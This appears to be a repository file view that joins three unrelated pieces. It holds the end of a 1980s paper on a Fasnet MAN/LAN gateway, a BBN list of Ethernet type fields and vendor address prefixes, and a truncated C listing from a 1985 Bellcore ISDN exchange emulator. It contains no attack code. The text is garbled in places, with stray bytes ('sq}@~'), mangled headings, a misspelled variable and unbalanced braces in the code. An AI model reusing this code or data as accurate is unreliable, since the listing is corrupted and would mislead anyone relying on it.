This circuit is responsible for
providing this information as well as certain MAC chip parameters.
This circuit would also monitor
statistics about the node's activities for billing etc.
There may
be a central control node for the whole network with which this circuit would
communicate to reconfigure addresses, diagnose network failures or exchange
statistical information.
The controller circuit would
therefore be able to construct Fasnet packets and transmit and receive
like any other service processor.
All the functions of the node controller were implemented in software that run
in the 68000 of the Ethernet Circuit in the LAN processor (see Figure^4).
"LAN Service Processor"
This processor does the function of a LAN/MAN bridge (see Figure^4),
it carries packets transparently between
two Ethernet LANs which may be separated by considerable distance.
A description of the functionality and philosophy of design
may be found in [ALBA86, DEGR86].
The LAN service processor consists of five circuits implemented on four boards,
which could probably be integrated down to one board using a VLSI technology
like that used for the MAC chip.
Each circuit performs a special task:
(1) Input Buffer, (2) Output Buffer,
(3) Depacketizer, (4) Packetizer, and (5) the Ethernet Circuit
and Node Controller.
These are general building blocks for any service processor.
The buffers are rather large, since a LAN is expected to generate more
traffic than a computer interface would, for example, but the design
can be scaled down and used in any case.
The packetizer and depacketizer
are bit-sliced processors offering very high throughput for communications,
but weak processing power.
The Ethernet circuit is a specialized processor
with potential for complex processing.
It can be tailored for another
purpose by substituting another interface for the Ethernet dependent
parts.
This processor is not, however, suited as a general purpose
computer because of the limited memory configuration.
Rather, it should be seen as a powerful dedicated controller.
"LAN Service Processor and Node Controller."
.H 2 "Input and Output Buffer Circuits"
The input buffer connects to the incoming paths of the FPB.
Each of the two large
circular buffers are synchronized to their respective MAC clocks.
Read
and write pointers are generated for each buffer, and the circuit
monitors whether the buffers are full or empty by
comparing the values of the two pointers.
The buffers themselves are
16K &times& 16 RAM chips with very fast (35 nsec) access times.
In this circuit, the 2-phase clock from the FPB is decoded and used.
On the other side, the buffers feed the depacketizer circuit, which uses
the clock of whichever input buffer it is reading at the time.
Two finite state machines (PLAs) which are referred to as the
"producer" and "consumer," govern the flow of data into
and out of the buffer, respectively.
The output buffer takes data from the packetizer circuit and stores it for
transmission on the outgoing FPB.
Many packets may be stored in
the single buffer along with information about which outgoing path(s)
each one is to be transmitted on.
Packets destined for both directions
on the network must be transmitted on each direction separately, since
the two MAC chips
cannot possibly be synchronized.
"Depacketizer and Packetizer Circuits"
The depacketizer and packetizer circuits are almost identical in hardware
but different in software.
The processor consists of an AMD
2910 bit-sliced sequencer and an AMD 2116 ALU chip.
The function performed
involves stripping Fasnet headers from incoming packets and storing the
Ethernet fragments away in a DRAM on the Ethernet Processor circuit, and
then indicating to that circuit when a packet is completely reconstituted
and ready for retransmission on Ethernet.
The depacketizer circuit also contains an Ethernet address filter, which
now consists of a hashing algorithm, but would ideally be implemented
as a Content Addressable Memory (CAM), which may
be available in the future.
Ethernet packets are filtered so that only the ones intended for local
Ethernet nodes are retransmitted.
Others are dropped.
The packetizer is the same processor as used in the depacketizer circuit,
except that the task here is to transform whole Ethernet packets into
bursts of Fasnet packets.
The Ethernet packets are completely and
transparently encapsulated.
Addresses are not converted. Headers are
added indicating Fasnet addresses and control information.
An Ethernet
address filter lets only those packets not destined for local Ethernet
nodes to escape to the MAN.
"Ethernet Processor Circuit"
This circuit consists mainly of two dynamic RAM controller chips, with their
respective banks of DRAM, which interface to the packetizer and depacketizer
circuits;
an AMD Local Area Network Controller for Ethernet (LANCE) chip; and
a 68000 microprocessor chip.
The 68000 takes care of initialization and
memory management, and the LANCE, which is itself a dedicated
microprocessor, takes care of getting traffic onto and
off of the Ethernet.
In addition, there are two UARTs on the 68000 which
allow a terminal and a modem to be connected to the node
for diagnostic purposes.
"Network Software Architecture"
For network management and operation purposes each network node
is structured according to the Open System Interconnection (OSI)
Reference Model to support communications between all the
nodes and the network controller.
Figure^5 shows the software network architecture.
The Management Control Unit consists of network management
and node management units.
.FG "Network Software Architecture."
The Network Management unit monitors the status of the network, collects
statistical data from each node and stores it on a disk, provides hard
copies of network statistics, and handles network set-up
and configurations of the Ethernet LAN interconnections via a human
administrator.
The Node Management Unit performs self-test on power up and upon receiving
requests from the Network Management Unit.
It also provides remote reset and
download capabilities to facilitate software updates and maintenances.
It maintains configuration data and collects statistical data about local
operations.
Upon receiving requests from the Network Management Unit,
it reports the most recent information about the node operations.
It also monitors any fault events on the node.
When a fault happens,
it attempts to either correct the fault problem or to collect more information.
In any case the fault is reported to the Network Management Unit along with
the result of attempted recovery.
In order to communicate reliably to each other, the Network Management Unit
and the Node Management Unit require the Transport layer services.
The Transport layer uses the Data Link layer services to handle
connection setup and termination, flow control,
multiplexing, fragmentation, and error detections and corrections.
The Data Link layer deals with sending and receiving packets to and from
other nodes without bit pattern errors.
Please note that these reliable
services are provided only for the management purposes.
They do not interfere with transparent wiring services offered
by the LAN processor.
In another word, these protocols
are logically separated from the transparent wiring services.
"Multi-Gigabit/second MAC Circuit"
This work investigates how to share the multigigabit/second
transport capabilities offered by lightwave systems among a multitude
of users and how to integrate the many broadband and narrowband services
that a user may require.
We have demonstrated a 1.2 Gb/s system to provide packet
communications in the distributed switching system shown in Figure^6.
The system provides multiple access at 1.2 Gb/s and consists
of a unique node architecture that combines available
lightwave, gallium arsenide, and silicon technologies [KARR87].
"Gigabit/second access interface."
Gallium arsenide (GaAs) multiplexer and demultiplexer ICs represent
today's most advanced technology.
Silicon very large scale integrated (VLSI) circuits have up to 100,000
transistors on a chip,
but generally do not operate in the Gb/s range.
Commercially available GaAs ICs will work above 1 Gb/s
and their circuit densities are rapidly advancing.
We use 8:1/1:8 multiplexer/demultiplexer GaAs ICs made by
Gigabit Logic Inc., together
with our silicon MAC IC to divide the 1.2 Gb/s bandwidth into
8 channels of 150 Mb/s.
These devices are considered "medium-scale integration" (MSI)
and contain about 200 gates.
The data is controlled by a packet switching protocol using control fields
only on one of the channels [GARR86].
The protocol, based on Fasnet, is executed by the Media Access Control (MAC)
chip.
Other channels carry only data and are synchronized to the control channel.
Thus each user has access to the full 1.2 Gb/s capacity on a per-packet basis.
Some gallium arsenide integrated circuit components are becoming available
in the 2 Gb/s range.
A 16:1 multiplexer and a 1:16 demultiplexer operating at 2.4 Gb/s were built
which could
upgrade the 150 Mb/s MAC circuit to 2.4 Gb/s.
Metropolitan area network technology enables users currently
connected to local area networks, geographically limited
within one building or office complex,
to extend their range of networking interconnectivity.
Large corporations that have several LANs operational at separate sites
interspersed within an urban area will be able to utilize their resources
more effectively and make them more widely available through the use of
MAN networking.
The technology is demonstrated in a laboratory test bed.
Working prototypes demonstrate that present technology is capable to
interconnect 10 Mb/s LANs over MANs implemented at 150 Mb/s
and to be upgraded to 1.2 Gb/s in the near future.
"REFERENCES"
[ALBA82]
A. Albanese,
"Fail-Safe Nodes for Lightguide Digital Networks,"
Bell System Technical Journal, Vol 61, Nr 2, pp 247-256, February 1982.
[ALBA86]
A. Albanese, G. DeGrandi, M.W. Garrett, "An Architecture for
Transparent MAN/LAN Gateways," IEEE International Conference on
Communications, Toronto, Canada, June 1986.
[DEGR86]
G. DeGrandi, M.W. Garrett, A. Albanese, T.H. Lee, "The Design and
Implementation of a Transparent MAN/LAN Gateway," Proc.
EFOC/LAN'86, Information Gatekeepers Inc., Amsterdam June 1986.
[FRAT87]
L. Fratta and A. Albanese,
"Service Integration for Interconnected LANs,"
The Third International Conference on Data Communication Systems and Their
Performance, Rio de Janeiro, Brazil, June 22, 1987.
[GARR86]
M.W. Garrett, J.O. Limb, A. Albanese, "Multiple Gb/s Fiber-Optic
Metropolitan Area Network," IEEE International Conference on
Communications, Toronto, Canada, June 1986.
[KARR87]
M. Karr, A. Albanese, M. Garrett, K.W. Loh, M. Maszczak,
"Experimental Gigabit Packet Communications Network,"
IEEE Optical Fiber Communications Conference,
Reno NV, February 1987.
[LIMB82]
J.O. Limb, C. Flores, "Description of Fasnet - A
Unidirectional Local Area Communications Network," Bell
Syst Tech Journal Vol 61, No 7, p 1413, Sept 1982.
[LOH86]
K. W. Loh, M. Karr, A. Albanese, W. C. Young, L. Curtis,
J. Baran, and L. McCaughan,
"Fail-Safe Nodes for Fiber Networks,"
Optical Fiber Conference, Atlanta, Georgia, February 24-26, 1986.
[STR87a]
L. Strigini, L. Fratta, and A. Albanese,
"Multicast Services on High-Speed Interconnected LANs,"
1987 Workshop on High Speed LANs,
Aachen, West Germany,
February 16-17, 1987.
[STR87b]
L. Strigini, L. Fratta, and A. Albanese,
"Explicit Offset Routing for Interconnecting High-Speed Networks,"
EFOC/LAN 87,
Basel Switzerland,
June 3-5, 1987.

+180
View File
@@ -0,0 +1,180 @@
%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
$%$ %$%
%$% Ethernet Fields $%$
$%$ %$%
%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%
This is dedicated to The Prophet :
Below are the current lists of values known at BBN for: Ethernet
Type Fields; Ethernet Address Vendor assignments; Ethernet
Multicast Address assignments. As these values are not published
by the IEEE, we maintain these lists for OUR use, and for distribution.
Current Ethernet and IEEE802.3 "Type" Fields 5/5/88
The 13th and 14th octets of an Ethernet or IEEE802.3 packet (after the preamble)
consist of the "Type" or "Length" field. These are formerly assigned by
Xerox, currently assigned by IEEE. Some assignments are public, others private.
Information currently available includes: Xerox Public Ethernet Packet
Type documentation; IEEE802.3 Std, but not yet further documentation from
IEEE; NIC RFC960; knowledge of some BBN Private Type Field values.
Hex
0000-05EE IEEE802.3 Length Field
0600 Xerox NS IDP *
0800 DOD Internet Protocol (IP) * #
0801 X.75 Internet
0802 NBS Internet
0803 ECMA Internet
0804 CHAOSnet
0805 X.25 Level 3
0806 Address Resolution Protocol (ARP) * (for IP and for CHAOS)
0807 XNS Compatibility
081C Symbolics Private
1000 Berkeley Trailer negotiation
1001-100F Berkeley Trailer encapsulation
1600 VALID-machine protocol? *
5208 BBN Simnet Private %
6000 DEC unassigned
6001 DEC Maintenance Operation Protocol (MOP) Dump/Load Assistance
6002 DEC Maintenance Operation Protocol (MOP) Remote Console
6003 DECNET Phase IV
6004 DEC Local Area Transport (LAT)
6005 DEC diagnostic protocol (at interface initialization?)
6006 DEC customer protocol
6007 DEC Local Area VAX Cluster (LAVC)
6008 DEC unassigned
6009 DEC unassigned
8003 Cronus VLN
8004 Cronus Direct
8005 HP Probe protocol
8006 Nestar
8010 Excelan
8035 Reverse Address Resolution Protocol (RARP)
8038 DEC LanBridge Management
8039 DEC unassigned
803A DEC unassigned
803B DEC unassigned
803C DEC unassigned
803D DEC Ethernet Encryption Protocol
803E DEC unassigned
803F DEC LAN Traffic Monitor Protocol
8040 DEC unassigned
8041 DEC unassigned
8042 DEC unassigned
805B Stanford V Kernel, experimental
805C Stanford V Kernel, production
809B EtherTalk (AppleTalk over Ethernet)
80F3 AppleTalk Address Resolution Protocol (AARP)
9000 Loopback (Configuration Test Protocol)
FF00 BBN VITAL-LanBridge cache wakeups %
* These protocols use Ethernet broadcast, where multicast would be preferable.
# BBN Butterfly Gateways also use 0800 for non-IP, with IP version field = 3.
% BBN Private Protocols, not registered
E 4/29/88
Ethernet hardware addresses are 48 bits, expressed as 12 hexadecimal digits
(0-9, plus A-F, capitalized). These 12 hex digits consist of
the first/left 6 digits (which should match the vendor of the Ethernet interface
within the station) and the last/right 6 digits which specify the interface
serial number for that interface vendor.
Currently we have noted the following vendor addresses, on the
BBN Corporate Ethernet.
000093 Proteon
0000AA Xerox Xerox machines
000102 BBN BBN internal usage (not registered)
00DD00 Ungermann-Bass
020701 Interlan UNIBUS or QBUS machines
020406 BBN BBN internal usage (not registered)
02608C 3Com IBM PC; Imagen; Valid
02CF1F CMC Masscomp
080002 Bridge
080005 Symbolics Symbolics LISP machines
080009 Hewlett-Packard
080010 AT+T
080014 Excelan BBN Butterfly, Masscomp
08001A Data General
08001E Apollo
080020 Sun Sun machines
080028 TI Explorer
08002B DEC UNIBUS or QBUS machines, VAXen, LANBridges
(DEUNA, DEQNA, DELUA)
080047 Sequent
08004C Encore
080068 Ridge
080089 Kinetics AppleTalk-Ethernet interface
08008B Pyramid
08008D XyVision XyVision machines
AA0003 DEC Physical address for some DEC machines
AA0004 DEC Logical address for systems running DECNET
Ethernet addresses might be written unhyphenated (e.g. 123456789ABC),
or with one hyphen (e.g. 123456-789ABC), but should be written hyphenated
by octets (e.g. 12-34-56-78-9A-BC).
These addresses are physical station addresses, not multicast nor
broadcast, so the second hex digit (reading from the left)
will be even, not odd.
At present, it is not clear how the IEEE assigns Ethernet block addresses.
Whether in blocks of 2**24 or 2**25, and whether multicasts are assigned
with that block or separately. A portion of the vendor block address
is reportedly assigned serially, with the other portion intentionally
assigned randomly. If there is a global algorithm for which addresses
are designated to be physical (in a chipset) versus logical
(assigned in software), I am unaware of the algorithm.
Cdresses 5/5/88
Ethernet Type
Address Field Usage
Multicast Addresses:
09-00-2B-01-00-01 8038 DEC LanBridge Hello packets
1 packet per second, sent by the
designated LanBridge
AB-00-00-01-00-00 6001 DEC Maintenance Operation Protocol (MOP)
Dump/Load Assistance
AB-00-00-02-00-00 6002 DEC Maintenance Operation Protocol (MOP)
Remote Console
1 System ID packet every 8-10 minutes, by every:
DEC LanBridge
DEC DEUNA interface
DEC DELUA interface
DEC DEQNA interface (in a certain mode)
AB-00-00-03-00-00 6003 DECNET Phase IV end node Hello packets
1 packet every 15 seconds, sent by each DECNET host
AB-00-00-04-00-00 6003 DECNET Phase IV Router Hello packets
1 packet every 15 seconds, sent by the DECNET router
AB-00-00-05-00-00 ???? Reserved DEC
through
AB-00-03-FF-FF-FF
AB-00-04-00-00-00 ???? Reserved DEC customer private use
through
AB-00-04-FF-FF-FF
AB-00-04-01-xx-yy 6007 DEC Local Area VAX Cluster
(LAVC Cluster group yy)
CF-00-00-00-00-00 9000 Ethernet Configuration Test protocol (Loopback)
Broadcast Address:
FF-FF-FF-FF-FF-FF 0600 XNS packets, Hello or gateway search?
6 packets every 15 seconds, per XNS station
FF-FF-FF-FF-FF-FF 0800 IP (e.g. RWHOD via UDP) as needed
FF-FF-FF-FF-FF-FF 0806 ARP (for IP and CHAOS) as needed
FF-FF-FF-FF-FF-FF 1600 VALID packets, Hello or gateway search?
1 packets every 30 seconds, per VALID station
----------------------------------------------------------------------------

+670
View File
@@ -0,0 +1,670 @@
$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
%$% %$%
$%$ ISDN "c" file $%$
%$% %$%
$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$
/* ISDN layer 3 msg parameter- cause- */
/* Feberuary 11, 1985 */
char *cocausemsg[0x65] = {
/* LOCUSER */ "User side",
/* LOCPNET */ "Local private network",
/* LOCLNET */ "Local network",
/* LOCTNET */ "Transit network",
/* LOCRNET */ "Remote local network",
/* LOCRPNET*/ "Remote private network",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* ABANDON */ "Call abandoned",
/* ORIFRAUD*/ "Invalid calling directory number",
/* NORMTR */ "Normal call termination",
/* USERBUSY*/ "User busy",
/* NORESPON*/ "No user responding",
/* WAITDEST*/ "This call waiting at destination",
/* CIROPER */ "Circuit operational",
/* CALLREJ */ "Call rejected",
/* NUMCHANG*/ "Destination number changed",
/* RCHARREJ*/ "Reverse charging rejected",
/* CALLSUSP*/ "Call suspend",
/* CALLRESU*/ "Call resumed",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* MSGOUT */ "Messages out-of-sync",
/* RESFAIL */ "Line restriction fails",
/* SPARE */ "",
/* CIROUT */ "Circuit out-of-order",
/* NOCHANN */ "No channel available",
/* NODESTOB*/ "Destination not obtainable",
/* DESTOUT */ "Destination out of order",
/* DEGRADE */ "Degraded service(excessive error rate)",
/* TNETOUT */ "Transit network out of order",
/* TDELAY */ "Transit delay range cannot be achieved",
/* THROUPUT*/ "Throughput range cannot be achieved",
/* NETFAIL */ "Network failure",
/* NETCONG */ "Network congestion",
/* INFODIS */ "User info discarded locally",
/* CHANOTCO*/ "Incompatible channel id",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* NOVERLAP*/ "Overlap sending not allowed",
/* NOFACISU*/ "Requested facility not subscribed",
/* NOREVERS*/ "Reverse charging not allowed",
/* OUTBARRE*/ "Outgoing calls barred",
/* OUTBACUG*/ "Outgoing calls barred with CUG",
/* INBARRE */ "Incoming calls barred",
/* INBACUG */ "Incoming calls barred with CUG",
/* NOWAITSU*/ "Call waiting not subscribed",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* NOBEARER*/ "Bearer capability not implemented",
/* NOCHTYPE*/ "Channel type not implemented",
/* NOTRANSI*/ "Transit network selection not implement",
/* NOMESSIM*/ "Message not implemented",
/* NOFACIRE*/ "Requested facility not implemented",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* NOCREF */ "No call reference available",
/* INVACREF*/ "Invalid call reference value",
/* NOCHANID*/ "Identified channel does not exist",
/* NOCALLID*/ "Call identity does not exist",
/* CALLIDUS*/ "Call identity in use",
/* INVDIGIT*/ "Invalid digit value for number",
/* NOCUGID */ "Non-existent closed user group",
/* NODESTCU*/ "Destination address not member of CUG",
/* INCOMDET*/ "Incompatible destination",
/* NOABBRE */ "Non-existent abbreviated address entry",
/* DESTMISS*/ "Destination address( direct call )misssing",
/* TRANSNEX*/ "Transit network does not exist",
/* IFACIPAR*/ "Invalid facility parameter",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* SPARE */ "",
/* NOMESSTY*/ "Message type non-existent or not implement",
/* MESSCLST*/ "Message not compatible with call state",
/* NOINFELE*/ "Information element non-existent",
/* INELECON*/ "Invalid information element contents"
.c
#include "ctsk.h"
#include "co.dbse.h"
#define VINIT 0 /* verbose initially off */
sq}@~
int msgdelay = 1; /* 1 means no delay */
int msgerrors = 1; /* 1 means no errors */
int cocpvrb = VINIT;
int col3vrb = VINIT;
int col2avrb = VINIT;
int col2bvrb = VINIT;
int col1a1vrb = VINIT;
int col1a2vrb = VINIT;
int col1b1vrb = VINIT;
int acctme = 0;
int acctca = 0;
int acctcc = 0;
int acctcp = 0;
int acctl3 = 0;
int acctl2 = 0;
int acctl1 = 0;
/************************/
/* */
/* CENTRAL OFFICE */
/* */
/************************/
cocon(){
char *p,bfr[BLEN];
int i,j,k,len;
/* clear the screen */
fprintf(COCON,"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
fprintf(COCON,"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"** **\n");
fprintf(COCON,"** ISDN Technology Transfer Package **\n");
fprintf(COCON,"** Copyright 1985 **\n");
fprintf(COCON,"** Bell Communications Research, Inc. **\n");
fprintf(COCON,"** **\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"****************************************\n\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"** **\n");
fprintf(COCON,"** ISDN Exchange Emulation **\n");
fprintf(COCON,"** **\n");
fprintf(COCON,"****************************************\n");
fprintf(COCON,"****************************************\n\n");
while(1){
if(len=string(IPCTTY,BLEN,p=bfr)){
if(sscanf(&p,"*stat*")){
fprintf(COCON,"Call Attmpts %6d\n",acctca);
fprintf(COCON,"Call Cmpltns %6d\n\n",acctcc);
fprintf(COCON,"L1 Sent/Rcvd %6d\n",acctl1);
fprintf(COCON,"Link Failure %6d\n\n",acctme);
fprintf(COCON,"L2 Processed %6d\n",acctl2);
fprintf(COCON,"L3 Processed %6d\n",acctl3);
fprintf(COCON,"CP Processed %6d\n",acctcp);
fprintf(COCON,"All L2+L3+CP %6d\n\n",acctl2+acctl3+cctcp);
if(sscanf(&p,"*clr*")){
acctme = 0;
acctca = 0;
acctcc = 0;
acctcp = 0;
acctcp = 0;
acctl3 = 0;
acctl2 = 0;
acctl1 = 0;
fprintf(COCON,"Cleared\n");
}
}
else if(sscanf(&p,"*vrb*")){
cocpvrb = 0;
col3vrb = 0;
col2avrb = 0;
col2bvrb = 0;
col1a1vrb = 0;
col1a2vrb = 0;
col1b1vrb = 0;
while(*p){
if(sscanf(&p,"*cp*"))
cocpvrb = 1;
else if(sscanf(&p,"*l3*"))
col3vrb = 1;
else if(sscanf(&p,"*l2*"))
col2avrb=col2bvrb = 1;
else if(sscanf(&p,"*l1*"))
col1a1vrb=col1a2vrb=col1b1vrb=1;
else
while((*p)&&(*p!=' '))
++p;
}
}
else if(sscanf(&p,"*delay*",&i)){
if(sscanf(&p,"*on*",&i))
msgdelay = 0;
else if(sscanf(&p,"*off*",&i))
msgdelay = 1;
if(msgdelay == 0)
fprintf(COCON,"Line delay on\n\n");
else
fprintf(COCON,"Line delay off\n\n");
}
else if(sscanf(&p,"*err*",&i)){
if(sscanf(&p,"*on*",&i))
msgerrors = 0;
else if(sscanf(&p,"*off*",&i))
msgerrors = 1;
if(msgerrors == 0)
fprintf(COCON,"Line errors on\n\n");
else
fprintf(COCON,"Line errors off\n\n");
}
/* print out stack area sizes for all process id */
else if(sscanf(&p,"*stk*",&i)){
dmpstk(COCON);
}
/* send a message to the MSP */
else if(sscanf(&p,"*msp*",&i)){
fprintf(COPRPH,"%s",p);
}
else if(sscanf(&p,"*admin*",&i)){
fprintf(COPRPH,"AD START",p);
fprintf(COPRPH,"AD CHTG",p);
fprintf(COPRPH,"AD GLOC",p);
fprintf(COPRPH,"AD 0050",p);
fprintf(COPRPH,"AD DEL",p);
fprintf(COPRPH,"AD WNKI",p);
fprintf(COPRPH,"AD",p);
fprintf(COPRPH,"AD CHTG",p);
fprintf(COPRPH,"AD GLOC",p);
fprintf(COPRPH,"AD 0050",p);
fprintf(COPRPH,"AD DEL",p);
fprintf(COPRPH,"AD WNKO",p);
fprintf(COPRPH,"AD",p);
fprintf(COPRPH,"AD END",p);
}
/* printout the call records */
else if(sscanf(&p,"*cr*",&i)){
if(sscanf(&p,"%d*",&i))
dpcallrec(i);
else{
if(ncallrecs)
for(i=0;i<ncallrecs;++i)
dpcallrec(sort[i]);
else
fprintf(COCON,"No calls\n");
}
fprintf(COCON,"\n");
}
/* print out the directory records */
else if(sscanf(&p,"*dr*",&i)){
if(sscanf(&p,"%d*",&i))
dpdnrec(i);
else{
if(ndnrecs)
for(i=0;i<ndnrecs;++i)
dpdnrec(i);
else
fprintf(COCON,"No directory numbers\n");
}
fprintf(COCON,"\n");
}
/* print out the line records */
else if(sscanf(&p,"*lr*",&i)){
if(sscanf(&p,"%d*",&i))
dplinerec(i);
else{
if(nlinerecs)
for(i=0;i<nlinerecs;++i)
dplinerec(i);
else
fprintf(COCON,"No lines\n");
}
fprintf(COCON,"\n");
}
/* print out the MSP port records */
else if(sscanf(&p,"*pr*",&i)){
for(i=0;i<nportrecs;++i){
fprintf(COCON,"(M%d,",portrec[i].module);
fprintf(COCON,"L%d,",portrec[i].line);
fprintf(COCON,"B%d)",portrec[i].bch);
fprintf(COCON,"[%04x]\n",portrec[i].port);
}
fprintf(COCON,"\n");
}
/* print out the suspended records */
else if(sscanf(&p,"*sr*",&i)){
if(sscanf(&p,"%d*",&i))
dpsuscall(i);
else{
if(nsuscalls)
for(i=0;i<nsuscalls;++i)
dpsuscall(i);
else
fprintf(COCON,"No suspended calls\n");
}
fprintf(COCON,"\n");
}
else if(sscanf(&p,"*hlp*",&i)){
fprintf(COCON,"Command syntax:\n");
fprintf(COCON," cr [#]\n");
fprintf(COCON," dr [#]\n");
fprintf(COCON," sr [#]\n");
fprintf(COCON," lr [#]\n");
fprintf(COCON," pr\n");
fprintf(COCON," msp cmnd\n");
fprintf(COCON," stk\n");
fprintf(COCON," err [on/off]\n");
fprintf(COCON," delay [on/off]\n");
fprintf(COCON,"\n");
}
else
fprintf(COCON,"???\n");
}
sleep();
}
#include "verbose.h"
#if VRBCP
#define LX if(cocpvrb){
#define RX }
#else
#define LX /X*
#define RX *X/
#define X
#endif
#include "ctsk.h"
#include "co.dbse.h"
#include "co.fcns.h"
extern int cocpvrb;
#define NOBCH -1
#define NTANYCH -2
/* MSG DEF BETWEEN L3 AND CALL PROCESSOR */
#define NTSETUP 0x01 /* Network SETUP */
#define NTALERT 0x02 /* Network ALERTING */
#define NTCONNE 0x03 /* Network CONNECT */
#define NTCONACK 0x04 /* Network CONNECT ACK */
#define NTRLCOMP 0x05 /* Network RELEASE COMP*/
#define NTCLEAR 0x06 /* Network CLEAR */
#define NTRELEASE 0x07 /* Network RELEASE */
#define NTDETACH 0x08 /* Network DETACH */
#define NTSUSPEN 0x09 /* Network SUSPEND */
#define NTSUSACK 0x0a /* Network SUSPEND ACK */
#define NTSUSREJ 0x0b /* Network SUSPEND REJ */
#define NTRESUME 0x0c /* Network RESUME */
#define NTRESACK 0x0d /* Network RESUME ACK */
#define NTRESREJ 0x0e /* Network RESUME REJ */
#define NTUSINFO 0x0f /* Network USERINFO */
#define NTSTATUS 0x10 /* Network STATUS */
#define NTFACI 0x11 /* Network FACILITY */
#define NTFACIAK 0x12 /* Network FACILITY ACK*/
#define NTFACIRJ 0x13 /* Network FACILITY REJ*/
/* CAUSE FOR TERMINATION */
#define LOCUSER 0x00 /* user side */
#define LOCLNET 0x02 /* location at local network */
#define NORMTR 0x10 /* normal call termination */
#define NODESTOB 0x23 /* no dir number exists */
#define NETCONG 0x2a /* database is full */
#define NOCREF 0x50 /* no callref available */
#define IFACIPAR 0x5c /* invalid facility parameter */
#define ORIFRAUD 0x0f /* security check fails */
#define RESFAIL 0x1f /* restriction code fails on outgoing calls */
/* MSG DEF BETWEEN CALL PROCESSOR AND MSP */
#define MSP_DISC 0x00 /* disconnect message to MSP */
#define MSP_CONN 0x01 /* connect message to MSP */
/* STATE DEF FOR CALL PROCESSOR */
#define NULL 0x00 /* NULL STATE */
#define SETUP 0x01 /* SETUP STATE */
#define ALERT 0x02 /* ALERT STATE */
#define CONNECT 0x03 /* CONNECT STATE */
#define CLEAR 0x04 /* CLEAR STATE */
#define FINAL 0x05 /* FINAL STATE */
#define SUSPEND 0x06 /* SUSPEND STATE */
char *cpstname[7] = {
"NULL ",
"SETUP ",
"ALERT ",
"CONNECT",
"CLEAR ",
"FINAL ",
"SUSPEND"};
char *l3msgname[20]= {
"","SETUP","ALERT","CONNECT",
"CONNECT ACK","RELEASE COMP","CLEAR","RELEASE","DETACH",
"SUSPEND","SUSPEND ACK","SUSPEND REJ","RESUME",
"RESUME ACK","RESUME REJ","USERINFO","STATUS",
"FACILITY","FACILITY ACK","FACILITY REJ"};
char *mspmsgname[2]={
"DISCONNECT","CONNECT"};
send_l3(cm,i,l,ca,u)
int i;
char cm,l,ca,*u;
{
char *p;
struct{
char cmnd;
int index;
char location;
char causeval;
char usinform[128];
}
msg;
msg.cmnd= cm;
msg.index= i;
msg.location= l;
msg.causeval= ca;
p= msg.usinform;
while(*p++ = *u++);
put(COL3,sizeof(msg),&msg);
LX fprintf(COCON,"%s indication to ",l3msgname[msg.cmnd]); RX
LX fprintf(COCON,"L3 [%d]\n",i); RX
}
send_msp(c,i,j)
int i,j;
char c;
{
struct{
char cmnd;
int module[2];
int line[2];
int bch[2];
int type;
}
msg;
msg.cmnd=c;
msg.module[0] = callrec[i].module;
msg.module[1] = callrec[j].module;
msg.line[0] = callrec[i].line;
msg.line[1] = callrec[j].line;
msg.bch[0] = callrec[i].bch;
msg.bch[1] = callrec[j].bch;
msg.type = callrec[i].bcap[1]&0x1f;
put(COPRPH,sizeof(msg),&msg);
LX fprintf(COCON,"%s indication to MSP\n",mspmsgname[msg.cmnd]); RX
}
#define TEION 0
cocp(){
int i,j,k,x,len;
int bfr[BLEN];
struct{
char cmnd;
int index;
char loca;
char caus;
char usinf[128];
}
l3msg;
while(1){
while(len=get(COL3,sizeof(l3msg),&l3msg)){
LX fprintf(COCON,"CP: "); RX
LX dpcallrec(l3msg.index); RX
LX fprintf(COCON,"STATE: %s\n",cpstname[callrec[l3msg.index].cpstate]); RX
switch(callrec[i=l3msg.index].cpstate){
case NULL:
switch(l3msg.cmnd){
case NTSETUP:
LX fprintf(COCON,"SETUP request from L3\n"); RX
if(!sec_check(i)){ /* security check on the calling directory number */
LX fprintf(COCON,"Security validation fails ("); RX
LX fprintf(COCON,"M%d,",callrec[i].module); RX
LX fprintf(COCON,"L%d,",callrec[i].line); RX
LX fprintf(COCON,"T%d,",callrec[i].tei); RX
LX fprintf(COCON,"S%d,",callrec[i].sapi); RX
LX fprintf(COCON,"%s)\n",callrec[i].dn); RX
send_l3(NTRELEASE,i,LOCLNET,ORIFRAUD,"");
callrec[i].cpstate=FINAL;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
}
LX fprintf(COCON,"Calling dn: %s is validated\n",callrec[i].dn); RX
switch(j=link(i)){
case DB_FULL:
send_l3(NTRELEASE,i,LOCLNET,NETCONG,"");
callrec[i].cpstate=FINAL;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
case NO_CREF:
send_l3(NTRELEASE,i,LOCLNET,NOCREF,"");
callrec[i].cpstate=FINAL;
LX fprintf(COCON,"NEXT STATE: FINAL\n\n"); RX
break;
case NO_DIR:
